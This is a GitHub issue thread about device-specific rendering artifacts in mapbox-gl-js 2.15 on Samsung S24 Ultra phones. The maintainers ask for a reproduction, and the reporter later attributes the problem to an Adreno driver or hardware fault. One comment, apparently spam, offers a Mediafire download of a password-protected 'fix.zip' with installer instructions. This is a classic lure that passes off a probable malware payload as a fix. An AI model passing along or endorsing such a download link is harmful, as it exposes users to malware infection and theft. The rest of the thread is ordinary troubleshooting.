### ISSUE TITLE
Rendering artifacts with Samsung S24 Ultra

### ISSUE THREAD

**Issue by tristan-morris** [mapbox/mapbox-gl-js#13261]
**mapbox-gl-js version**: ~2.15

### Question
I'm trying to get to the bottom of a fairly strange device specific issue. Two users have submitted the below screenshots, and essentially what could possibly be going on? 

These are from Samsung S24 Ultras, using the latest Chrome with the older build of Mapbox GL JS 2.15 (webgl v1). My initial guess was defective hardware, but now I'm thinking possibly something in the device's gfx render pipeline. Ideally, I want to work around it or identify what is the cause. But short of going out and buying a flagship device, perhaps there's a known issue?

![image](https://github.com/user-attachments/assets/d596b99a-963a-4a68-876c-03aff9234333)

![image](https://github.com/user-attachments/assets/3bb7f239-6464-490a-8bdf-7666ffcbf126)

### Reproduction
I've tried to reproduce with some Lambda Test devices and Samsung's Remote Devices without luck. Minimum reproduction is Mapbox GL JS on Samsung S24 Ultra in Chrome (+some trait), with a satellite layer - https://docs.mapbox.com/mapbox-gl-js/example/satellite-map/ - also causes this issue on these devices.

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by underoot** [comment]
Thank you for opening this ticket. To help address the problem accurately can you please provide a minimal, complete, verifiable demonstration of the issue. We recommend using [JSFiddle - Code Playground](https://jsfiddle.net/). I've checked our docs example with Samsung Galaxy Fold4 and everything looks okay, but I haven't checked exactly on S24 Ultra. 

Could you share center coordinates, style URL and instructions in the minimal example also. Thank you!

**Comment by tristan-morris** [comment]
Thanks @underoot. That's useful to confirm there's no known issue with this platform. As far as reproduction goes, I organised for one of the users with the 'bad device' to open the fiddle created from satellite-map example listed above. They experienced the same blue corrupt pixels/blocks, visually similar to the above. 

I've tried to re-create this on 5x Samsung S24 Ultra devices in Samsung's Remote Test Lab, and a handful of similar devices in Lambda Test without luck. 

I'm going to put this down to either a hardware fault or driver bug with the Adreno 750. There are a few comments in other issues in this repo and others regarding poor quality of the Adreno drivers, along with some Reddit comments that there are manufacturing quality issues with the S24. But grain of salt. 

I'll close but will continue looking into this and will update with anything interesting.
